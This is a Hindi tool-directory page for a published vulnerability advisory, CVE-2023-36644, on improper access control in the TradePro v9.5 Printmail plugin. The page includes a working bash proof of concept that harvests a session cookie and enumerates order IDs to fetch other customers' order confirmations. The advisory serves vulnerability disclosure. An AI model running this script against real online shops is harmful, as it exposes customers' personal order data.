Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-36644 | Kitploit
उपकरण/GitHubGitHub/caffeinated-labs/cve-2023-36644
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubcaffeinated-labs/cve-2023-36644

CVE-2023-36644

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

== प्रभावित सॉफ्टवेयर [%hardbreaks] विक्रेता: ITB-GmbH प्रभावित उत्पाद: TradePro (v9.5) घटक: Printmail Plugin पुष्टि: हाँ

== हमला वेक्टर [%hardbreaks] प्रकार: गलत एक्सेस नियंत्रण एक्सेस-प्रकार: रिमोट प्रभाव: सूचना प्रकटीकरण

printmail प्लगइन में गलत एक्सेस नियंत्रण ITB-GmbH TradePro v9.5 को रिमोट हमलावरों को किसी http(s) एंडपॉइंट पर मनमाना ऑर्डर नंबर पास करके ऑनलाइन शॉप से सभी ऑर्डर पुष्टिकरण प्राप्त करने की अनुमति देता है।

== विवरण orderid पहले से ज्ञात होना चाहिए, लेकिन इसे आसानी से या SQLi का उपयोग करके गणना किया जा सकता है (रिपोर्ट देखें link:/security/CVE-2023-36645[CVE-2023-36645])

एक मान्य लेकिन अप्रमाणित सत्र कुकी के साथ http(s)://[DOMAIN]/shop/de/?plugin=printmail&wkid=[COOKIE]&orderid=[ORDER_ID] को कॉल करने से हमलावर को सभी ऑर्डर पुष्टिकरणों तक पहुंच मिल जाती है।

== CVSS [%hardbreaks] स्कोर: 7.1 वेक्टर: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P]

== PoC [source, bash]

#! /bin/bash DOMAIN=$1 TEST_PATH="shop/de/sys/" #TEST_PATH="shop/de/" SAMPLE1_ID=0

COOKIE=$(curl -s -c - $DOMAIN | grep sessiontradepro | cut -f7) echo "Got Cookie: $COOKIE" SAMPLE1=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE1_ID" | grep size_download | cut -d" " -f2) echo Test URL: "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=%ID%" echo "========" echo $SAMPLE1_ID $SAMPLE1 for SAMPLE2_ID in {24000..25000} do SAMPLE2=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE2_ID" | grep size_download | cut -d" " -f2) echo $SAMPLE2_ID $SAMPLE2 done

== श्रेय

  • Lynn
  • Jadyn
  • https://zerforschung.org[zerforschung.org]
टूल डाउनलोड करें